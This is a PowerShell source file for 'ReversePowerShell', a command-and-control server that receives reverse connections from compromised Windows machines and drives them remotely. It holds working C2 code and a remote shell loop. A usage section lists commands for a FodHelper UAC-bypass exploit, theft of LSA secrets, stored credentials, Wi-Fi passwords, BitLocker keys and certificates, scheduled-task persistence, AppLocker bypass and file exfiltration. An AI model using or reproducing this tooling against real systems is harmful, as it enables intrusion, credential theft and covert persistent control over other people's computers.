﻿##### Scriptinfo ##################################################################################
# Scriptreihe:      RePS - ReversePowerShell::CC-Server
# Datum:            2018-05-09
# Version:          V1.05
# Programmierer:    Stephan Walther
###################################################################################################

# Variablen
    $ServerName     = '192.168.101.108'
    $ServerIP       = '192.168.101.108'
    $Port           = 389  
    $OutputEnabled  = $true
    $OutputDetailed = $false
    $ScriptDir      = "E:\ReversePowerShell"
    $ModuleDirs     = 'QuickCommands','Payloads'

    $GlobaleVars = 'TcpServer','TcpClient','TcpStream','ClientIP','ClientPort','ClientName'    
    cls

function write-CCHost {    
    param(
        [Parameter(Mandatory=$false)] [string] $Message,
        [Parameter(Mandatory=$false)] 
            [validateset('Magenta','Cyan','Yellow','Green','White')] [string] $FontColor = 'cyan',
        [Parameter(Mandatory=$false)] [switch] $DetailedOnly = $false
    )

    if ($OutputEnabled) {
        if (($DetailedOnly -and $OutputDetailed) -or -not $DetailedOnly) {
            Write-Host "$Message" -ForegroundColor $FontColor
        } 
    }
}

function Start-CCServer {
    <#
    .Synopsis
       Start the CC-Server by calling PS c:\> Start-CCServer
    
    .EXAMPLE
       Start-CCServer 
       Start-CCServer -Port 4443
    .COMPONENT
       HelpPos1
    #>
    param($ServerPort = $Port)

    # define global variables
        Get-Variable -Scope global | Where-Object {$GlobaleVars -contains $_.name} | Remove-Variable -Scope global
        $GlobaleVars | ForEach-Object { New-Variable -Name $_ -Value @() -Scope global }
    
    # check if the defined ServerIP is available
        if (-not ((Get-NetIPAddress -AddressFamily IPv4 -AddressState Preferred).IPAddress -contains $ServerIP)) {
            write-CCHost -Message "ServerIP $ServerIP is not available..." -FontColor Magenta
            break
        }

    # permit incoming connections through the Windows Firewall
        #New-NetFirewallRule -Name 'CC-Server1' -DisplayName 'CC-Server1' -Enabled True -Profile Any -Direction Inbound -Action Allow -Protocol TCP -LocalPort $Port        #| Out-Null
        #New-NetFirewallRule -Name 'CC-Server2' -DisplayName 'CC-Server2' -Enabled True -Profile Any -Direction Inbound -Action Allow -Protocol TCP -LocalPort $PortRestart #| Out-Null

    # initiate and start a TCP-Server
        $global:TcpServer = New-Object System.Net.Sockets.TcpListener -ArgumentList $ServerIP,$ServerPort     
        $ServerIP   = $TcpServer.LocalEndpoint.Address.IPAddressToString
        write-CCHost -Message "start CC-Server on $($ServerIP):$ServerPort - waiting for incoming connection" -FontColor Cyan
        $TcpServer.Start() 

    # wait for incoming connections (freezes the execution until a connection is established)
        $global:TcpClient  = $TcpServer.AcceptTcpClient()     
        $global:ClientIP   = $TcpClient.Client.RemoteEndPoint.Address.IPAddressToString
        $global:ClientPort = $TcpClient.Client.RemoteEndPoint.Port
        write-CCHost -Message "   connection from $($ClientIP):$ClientPort established" -FontColor Green

        $global:TcpStream = $TcpClient.GetStream() 

    # read the ClientName
        $global:ClientName = ((Send-CCMessage -PSCommand "`$env:computername" -ReturnValue) -split "`r`n")[0]
        write-CCHost -Message "   Clientname: $ClientName" -FontColor Green

    # render Remote-QuickCommands and show Connection-Infos
        Create-CCQuickCommands
        Show-CCState

    # Display Connection-Info in WindowsTitle
        $Host.UI.RawUI.WindowTitle = ($Host.UI.RawUI.WindowTitle -split '-')[0].trim(),"ReversePowerShelled from $Clientname ($($ClientIP):$ClientPort)" -join ' - '    
}

function Show-CCState {
    <#
    .Synopsis
       Displays the current Sessionstate
    
    .EXAMPLE
       Show-CCState
    .COMPONENT
       HelpPos3
    #>

    write-CCHost -Message "Server- and SessionInformation:"
    if ($TcpServer.Server) {
        $I = $TcpServer.LocalEndpoint.Address.IPAddressToString
        $P = $TcpServer.LocalEndpoint.Port

        write-CCHost -Message "   TCP-Server: $($I):$P" -FontColor Green
        
    } else {
        write-CCHost -Message "   TCP-Server: not connected" -FontColor Yellow
    }
    
    if ($TcpClient.Connected) {
        write-CCHost -Message "   TCP-Client: $(($ClientName -split "`r`n")[0]) @ $($clientIP):$clientPort" -FontColor Green
    } else {
        write-CCHost -Message "   TCP-Client: not connected" -FontColor Yellow
    }

    if ($TcpStream.CanRead -and $TcpClient.Connected) {
        write-CCHost -Message "   TCP-Stream: online" -FontColor Green
        $IsAdmin = ((Send-CCMessage -PSCommand '([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")' -ReturnValue) -split "`r`n")[0]
        
        if ($IsAdmin -eq 'True') {
            write-CCHost -Message "   CC-Session: Admin-Session" -FontColor Green
        } else {
            write-CCHost -Message "   CC-Session: User-Session" -FontColor Yellow
        }        
    } else {
        write-CCHost -Message "   TCP-Stream: not available" -FontColor Yellow
    }
}

function Send-CCMessage {
    <#
    .Synopsis
       Sends a Command to the RemoteClient
    
    .EXAMPLE
       Send-CCMessage -PSCommand 'dir c:\Users' 
    .COMPONENT
       HelpPos4
    #>

    [CmdletBinding()]
    Param(
        [parameter(Mandatory=$false)] [string] $PSCommand,      
        [parameter(Mandatory=$false)] [switch] $ReturnValue = $false,
        [parameter(Mandatory=$false)] [bool]   $DontWaitForAnswer = $false
    )

    $Data = $PSCommand
         
    if ($TcpClient.Connected) {        
        write-CCHost -Message "sending message: $Data" -DetailedOnly
        $Data = [text.Encoding]::Ascii.GetBytes($Data)    
        try {
            $TcpStream.Write($Data,0,$Data.length)
        }
        catch {
            write-CCHost -Message "error: connection lost!" -FontColor Magenta            
            break
        }

        if ($DontWaitForAnswer -eq $false) {
            write-CCHost -Message "waiting for answer" -DetailedOnly
            $Answer = ""
            do {                
                if ($TcpStream.DataAvailable) {  
                    $Answer = ""  
                    $LoopCount = 0
                    do {    
                        [byte[]]$byte = New-Object byte[] 64512
                        $byteCount = $TcpStream.read($byte, 0, $byte.Length)
                        $Answer += [text.encoding]::ASCII.GetString( (1..$byteCount | ForEach-Object { $byte[$_-1] } ) )

                        if ($LoopCount -ge 1) { write-CCHost -Message "received $([int] ($Answer.Length / 1KB))kb" }
                        $LoopCount += 1
                    } while ($TcpStream.DataAvailable)

                    if ($ReturnValue) {
                        Return $Answer                    
                    } else {
                        if ($Answer -ne 'success') {
                            if ($Answer -like "`r`n") {
                                write-CCHost -Message "answer:" -FontColor Cyan
                                write-CCHost -Message "$Answer" -FontColor Cyan
                            } else {
                                write-CCHost -Message "answer: $Answer" -FontColor Cyan
                            }
                        }
                    }                
                } else {            
                    Start-Sleep -Milliseconds 10
                }
            } while ($Answer -eq "" -and $TcpStream.CanRead -and $TcpClient.Connected)
        }
        Start-Sleep -Milliseconds 10                    
    } else {
        write-CCHost -Message "error: connection lost!" -FontColor Magenta
        $Host.UI.RawUI.WindowTitle = ($Host.UI.RawUI.WindowTitle -split '-')[0].trim()     
    }  
}

function Stop-CCServer {
    <#
    .Synopsis
       Shutdown the CC-Server and disconnect the CC-Client (dirty whitout 'close-connection')
    
    .EXAMPLE
       Stop-CCServer
    .COMPONENT
       HelpPos7
    #>

    # close Connection
        write-CCHost -Message "closing Server"
        try {        
            $global:TcpStream.Close() 
            $global:TcpClient.Dispose()
            $global:TcpServer.Stop()
            $global:TcpServer.Server.Dispose() 
        }
        catch { }

    # cleanup variables
        Get-Variable -Scope global | Where-Object {$GlobaleVars -contains $_.name} | Remove-Variable -Scope global
        $GlobaleVars | ForEach-Object { New-Variable -Name $_ -Value @() -Scope global }
    
    # Reset the WindowTitle
        $Host.UI.RawUI.WindowTitle = ($Host.UI.RawUI.WindowTitle -split '-')[0].trim()   

    # Remove Firewall Exceptions
        #write-CCHost -Message "removing firewall-exclusion"
        #Get-NetFirewallRule -Name 'CC-Server1' | Remove-NetFirewallRule

    # Display Status
        Show-CCState
}

function Create-CCQuickCommands {
    <#
    .Synopsis
       Renders all Scripts or a single Script in the Scriptdirectories as RemoteFunctions. Needs an active Connection.
    
    .EXAMPLE
       Create-CCQuickCommands
       Create-CCQuickCommands -FileName download-file.ps1
    .COMPONENT
       HelpPos2
    #>
    param ([string] $FileNameFilter = '*')

    # Read Code for ClientRestart as BASE64-String    
        $Code = Get-Content -Path "$ScriptDir\cc-ClientRestart.ps1"
        $Code = $Code -replace 'localhost',$ServerName
        $Code = $Code -replace '9005',$Port
        $Code = $Code -join "`r`n"
        $Code = [System.Text.Encoding]::Unicode.GetBytes($Code)
        $enc = [Convert]::ToBase64String($code)
        
    # import Scripts as RemoteFunctions and LocalFunction
        $ModuleDirs | ForEach-Object {
            $ModuleDir = $_
            write-CCHost -Message "Declaring remote functions from modulepath '$ScriptDir\$ModuleDir'"

            Get-ChildItem -Path "$ScriptDir\$ModuleDir" -Filter "*$($FileNameFilter)*" | ForEach-Object {
                # Split scripting-text and search for wellknown parts
                    $FunctionName    = $_.BaseName
                    $FunctionFile    = Get-Content -Path $_.FullName
                    $FunctionCodeRAW = $FunctionFile | Where-Object {$_ -notlike '#*'}
                    $FunctionCall    = $FunctionFile | Select-String '# QuickCommand'
                    $FunctionPreReqs = $FunctionFile | Select-String '# PreReqs'

                # find optional code for the localFunction
                    $FunctionCode      = @()
                    $FunctionCodeLocal = @()
                    $FunctionCodeEOF   = $false
                    $FunctionCodeRAW | ForEach-Object {
                        if ($_ -like '$CCLocalFunction*') {$FunctionCodeEOF = $true}

                        if ($FunctionCodeEOF -eq $false) {
                            $FunctionCode += $_        
                        } else {
                            $FunctionCodeLocal += $_
                        }
                    }
    
                # Create the RemoteFunction on the target-system
                    if ($FunctionPreReqs -like '*admin*') {
                        $FunctionBody = {
                            function FunctionName {                                
                                if ((Gather-Privileges).IsAdmin) {
                                    FunctionCode
                                } else {
                                    "need Admin-Privileges... :-("
                                }                 
                            }
                        }
                    } else {
                        $FunctionBody = {
                            function FunctionName {                                
                                FunctionCode       
                            }
                        }
                    }
                    
                    $FunctionBody = $FunctionBody -replace 'FunctionName',$FunctionName
                    $FunctionBody = $FunctionBody -replace 'FunctionCode',($FunctionCode -join "`r`n" -replace '\$','%%')
                    $FunctionBody = $FunctionBody -replace '%%','$'
                    $FunctionBody = $FunctionBody -replace 'encodedRestartCode',$enc
                                                
                    write-CCHost -Message "   sending function '$FunctionName'"
                    Send-CCMessage -PSCommand $FunctionBody
        
                    if ($FunctionCall.length -gt 0) {
                        ($FunctionCall -split ':')[1].trim() -split ',' | ForEach-Object {
                            $val = ($FunctionName + " " + ($_ -replace "'") ).trim()

                            $global:AllQuickCommands += $val 
                        }
                    } else {
                        $global:AllQuickCommands += $FunctionName
                    }

                # create the LocalFunction on the server-system
                    if ($FunctionCodeLocal.count -eq 0) {
                        $FunctionParam   = @()
                        $KeepReading = $false 

                        $FunctionFile | ForEach-Object {
                            if (($_.trim() -replace ' ') -like "param(") {$KeepReading = $true}

                            if ($KeepReading) {
                                if ($_ -notlike '#*') { $FunctionParam += $_}
                            }
                            if ($_.trim() -eq ")") {$KeepReading = $false}
                        }

                        $FunctionBody = {
                            function global:cc-FunctionName {                                
                                Functionparam
                                
                                $Command = 'FunctionName2'
    
                                $PSBoundParameters.Keys | ForEach-Object {
                                    $Command += " -" + $_ + " " + $PSBoundParameters[$_]
                                }
                        
                                Send-CCMessage -PSCommand "$Command"                            
                            }
                        }
                        $FunctionBody = $FunctionBody -replace "FunctionName2",($FunctionName  -replace '_','-')
                        $FunctionBody = $FunctionBody -replace "FunctionName" ,($FunctionName -replace "_" -replace '-')
                        $FunctionBody = $FunctionBody -replace "Functionparam",($FunctionParam -join "`r`n")      

                    } else {
                        $FunctionBody = ($FunctionCodeLocal | Select-Object -Skip 1 | Select-Object -SkipLast 1) -join "`r`n"
                    }
                        
                    Invoke-Expression $FunctionBody
            }
        }                   
}

function Enter-CCSession {
    <#
    .Synopsis
       Enter a remote session to the CC-Client. Needs an active Connection.
    
    .EXAMPLE
       Enter-CCSession       
    .COMPONENT
       HelpPos6
    #>

    # initiate loop-CLI
        $finished = $false
    
        Show-CCState

        write-CCHost -Message "Type 'exit' to leave remote prompt"
        write-CCHost -Message ""    
    
    # loop-CLI
        do {
            $ClientCurrentPath = ((Send-CCMessage -PSCommand 'get-location' -ReturnValue) -split "`r`n") | Select-String ':'
            $command = Read-Host "[$ClientName - $ClientCurrentPath] RPS>"
            if ($command -eq 'exit') {
                $finished = $true 
            } else {
                Send-CCMessage -PSCommand $command
            }
        } While ($finished -ne $true) 
}

function cc-help {
    param([switch] $ShowExample = $false)

    # show help for Server-Functions
        write-CCHost -Message "Server-Functions:"     
        $Data = Get-Command -noun cc* | 
            Where-Object {'write-CCHost' -notcontains $_.name} | 
                Get-Help -Detailed | 
                    Sort-Object -Property component | 
                        Select-Object name,@{n='example';e={$_.examples[0].example.code}},synopsis |                         
                            Format-Table -Property name,$(if ($ShowExample) {'example'} else {'synopsis'}) -AutoSize |
                                Out-String
        ($Data.TrimEnd() -split "`r`n") | ForEach-Object { write-CCHost -Message "   $($_)" }
    
    # show help for the scripted Functions
        write-CCHost -Message ""
        write-CCHost -Message "Remote-Functions:"    
        $Data = Get-Command -verb cc | 
            Where-Object {'cc-help' -notcontains $_.name} | 
                Get-Help -Detailed | 
                    Sort-Object -Property component | 
                        Select-Object name,@{n='example';e={$_.examples[0].example.code}},synopsis |                         
                            Format-Table -Property name,$(if ($ShowExample) {'example'} else {'synopsis'}) -AutoSize |
                                Out-String
        ($Data.TrimEnd() -split "`r`n") | ForEach-Object { write-CCHost -Message "   $($_)" }     
}

# WaitingForConnection
    Start-CCServer    
    break
    cc-help

# Interactive Mode
    # Interaction
        cc-ShowConsole
        cc-HideConsole

    # System Information
        cc-GatherSysInfo
        cc-GatherSysInfo -category OS

        cc-GatherSecurityChecks
        cc-GatherSecurityChecks -View Detailed
        cc-GatherSecurityChecks -component AntiVirus -View Detailed
        
    # Privilege Escalation
        cc-RestartAsAdmin -Method runas
        cc-RestartAsAdmin -Method FodHelperExploit
    
    # Steal Goodies
        cc-getMSProductKeys
        cc-getCredentialsIExplore
        cc-getCredentialsWLAN
        cc-getBitlockerRecoveryKeys
        cc-getCredentialsCredMan
        cc-getLSASecrets
                
        cc-getCertificates -ListOnly true
        cc-getCertificates -CertStore CurrentUser -ListOnly true
        cc-getCertificates -CertStore CurrentUser -DestinationPath e:\
        cc-getCertificates -DestinationPath e:\
    
    # stay persistent        
        cc-staypersistent -Method ScheduledTask
        cc-staypersistent -Method ScheduledTask -Mode del
        
    # File-Operations:
        Create-CCQuickCommands -FileNameFilter file
        cc-downloadFile -FilePath c:\olga\testfile.txt -DestinationPath e:\ 
        cc-downloadFile -FilePath c:\olga\test.pdf -DestinationPath e:\    
        cc-uploadFile -FilePath E:\test.txt -DestinationPath c:\users\olga.ordnung\desktop\test.txt
        
        
                        
        

    # DEV1:
        # Bypass-Applocker
        Create-CCQuickCommands -FileNameFilter *appl*
        cc-StartExecutableWithApplocker -ExePath c:\users\olga.ordnung\desktop\treesizefree.exe -WindowsStyle normal -BypassApplocker true
        enter-CCSession

    # DEV2:     
        Send-CCMessage -QuickCommand get-CredentialsPowerDump
        Send-CCMessage -PSCommand '(Get-Command -Name get-CredentialsPowerDump).Definition | out-file -filepath c:\gpd.ps1'
        Send-CCMessage -PSCommand '(Get-Command -Name gather-privileges).Definition | out-file -filepath c:\gp.ps1'
        
# CloseServer
    cc-closeconnection
    Stop-CCServer

# CleanUp (DEV)
    Get-Process cmd | kill
    Get-Process powershell | kill
           
# SIG # Begin signature block
# MIII4QYJKoZIhvcNAQcCoIII0jCCCM4CAQExCzAJBgUrDgMCGgUAMGkGCisGAQQB
# gjcCAQSgWzBZMDQGCisGAQQBgjcCAR4wJgIDAQAABBAfzDtgWUsITrck0sYpfvNR
# AgEAAgEAAgEAAgEAAgEAMCEwCQYFKw4DAhoFAAQUG0lfkWOaN2zj2iRNo4676yxB
# 2zCgggY/MIIGOzCCBSOgAwIBAgITGwAAAOBAvnzebcAjSAABAAAA4DANBgkqhkiG
# 9w0BAQsFADBUMRMwEQYKCZImiZPyLGQBGRYDaXRzMRIwEAYKCZImiZPyLGQBGRYC
# d3MxKTAnBgNVBAMTIFdTLUlUUy1aZXJ0aWZpemllcnVuZ3NzdGVsbGUtQ0ExMB4X
# DTE3MDUxMDA1NDI0OVoXDTE5MDUxMDA1NTI0OVowdTETMBEGCgmSJomT8ixkARkW
# A2l0czESMBAGCgmSJomT8ixkARkWAndzMQswCQYDVQQLEwJXUzERMA8GA1UECxMI
# QmVudXR6ZXIxDzANBgNVBAsTBldTLUlUUzEZMBcGA1UEAxMQV2FsdGhlciwgU3Rl
# cGhhbjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKqnKBq0nJLvqGwO
# aJkLU2174/KhLd4ykJZ2BgG4wse7s3ALM7dH1vxNmeKIoB09yk9nYZzDeRjZ7w7a
# WKgko8zvNHJCleQNtG6AReOoMIRuYyrbUmbKlmICn9V/ENUNQ6s1tiqnAIChb0J2
# 05GMaBYG+IFS+uLDzlTIsoaEKZjV3htgBEVQt6BYIdbsZ913ZUcpGWhQsCXKairT
# wB8pqPTaBCA5HJHyfAwxa+w2ERhF5q0r/xp9dEkemFjy0Xo9aQWUw3WPy8l3pTyp
# I2w/yDFqLfZu5z1QjWrcNA9VirSiM9PkOPXQb9riChc4PfFd90+JjeVhOlj3y0qb
# InQsfUMCAwEAAaOCAuMwggLfMA4GA1UdDwEB/wQEAwIHgDA8BgkrBgEEAYI3FQcE
# LzAtBiUrBgEEAYI3FQiIoH6B98FWhLmPAobjm2SE8KUnMYPz1QqE8ow3AgFkAgEC
# MB0GA1UdDgQWBBT1lyML2Qw04hBbAlX5PeqiA5IBQjAfBgNVHSMEGDAWgBS1Nrmv
# a6rveo5pQqKi2+u+kQ59cTCCASAGA1UdHwSCARcwggETMIIBD6CCAQugggEHhoHE
# bGRhcDovLy9DTj1XUy1JVFMtWmVydGlmaXppZXJ1bmdzc3RlbGxlLUNBMSgxKSxD
# Tj1XUy1DQTEsQ049Q0RQLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
# cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9d3MsREM9aXRzP2NlcnRpZmljYXRl
# UmV2b2NhdGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Q
# b2ludIY+aHR0cDovL2NybC53cy5pdHMvY3JsZC9XUy1JVFMtWmVydGlmaXppZXJ1
# bmdzc3RlbGxlLUNBMSgxKS5jcmwwgc0GCCsGAQUFBwEBBIHAMIG9MIG6BggrBgEF
# BQcwAoaBrWxkYXA6Ly8vQ049V1MtSVRTLVplcnRpZml6aWVydW5nc3N0ZWxsZS1D
# QTEsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNlcnZpY2Vz
# LENOPUNvbmZpZ3VyYXRpb24sREM9d3MsREM9aXRzP2NBQ2VydGlmaWNhdGU/YmFz
# ZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5MBMGA1UdJQQMMAoG
# CCsGAQUFBwMDMBsGCSsGAQQBgjcVCgQOMAwwCgYIKwYBBQUHAwMwKQYDVR0RBCIw
# IKAeBgorBgEEAYI3FAIDoBAMDnN0ZXBoYW5Ad3MuaXRzMA0GCSqGSIb3DQEBCwUA
# A4IBAQBjyTnnRXeyMEPW8SziBVFJcsX0K3XLCXz7PEl6sVuiWTHY3n9IOwJJ2sqF
# 3Sea0bpWrDFnJQtB+S4FXW6A/bVvuPlGMBtZ7T9DowowAQAmWvC/OJeeHGz2xyjh
# fDYAmMi3DXrVIEv+yWHsrh6CSt0KiHjMOh/Kk092AmyyPSRZpqmabzcoY7fI6xff
# ckOvS+Q3233ytXfS2YMuNKL8EuGaUhGj8Smb3grUtNW0kyJmL2wTgyWdUerbGpC3
# Ss7iv53hJXSoe8Rmo8spntb/5e+zt6q0ThqI4TN6sm9Gqgg8QcfzGc0XvW7V2GKU
# LT75dOMzV86lFZo+rvq1SaZb2GRcMYICDDCCAggCAQEwazBUMRMwEQYKCZImiZPy
# LGQBGRYDaXRzMRIwEAYKCZImiZPyLGQBGRYCd3MxKTAnBgNVBAMTIFdTLUlUUy1a
# ZXJ0aWZpemllcnVuZ3NzdGVsbGUtQ0ExAhMbAAAA4EC+fN5twCNIAAEAAADgMAkG
# BSsOAwIaBQCgeDAYBgorBgEEAYI3AgEMMQowCKACgAChAoAAMBkGCSqGSIb3DQEJ
# AzEMBgorBgEEAYI3AgEEMBwGCisGAQQBgjcCAQsxDjAMBgorBgEEAYI3AgEVMCMG
# CSqGSIb3DQEJBDEWBBRTjWNdJVrL9AWc+8yqQS+XJHbhFTANBgkqhkiG9w0BAQEF
# AASCAQCheodDamNn351iGWSUSGJO0l3PryIp+KVizkk+oXKm8yObF3GZ2z+t5bFy
# LkbMM51huqgT4Ex8LaBXVofuGZrJ5jHhAe2P4NzpCpjiMWJzoTwmFpHa9rl/jsEd
# qe8HXYQtRd5Y6nahk1oPW8FUu4u0jGrFDXbUQSFeyxTtbxfYw3xYhDu8oON6dJtO
# ZusoSFOkqSHSl+oiU1tQ5HtCo+n9ivTiBeOjHo3PT8qFfWUQ48kjUejJQTCeiNSc
# ThRgqyMkdKZ6jnyNjOEwXbkBO6kwPx4lH427OLpMcmJ64AUrNW55C4zHHDpgepmL
# 6CySlZ7+kwMwjbo5m7LWf4Yi3gtp
# SIG # End signature block
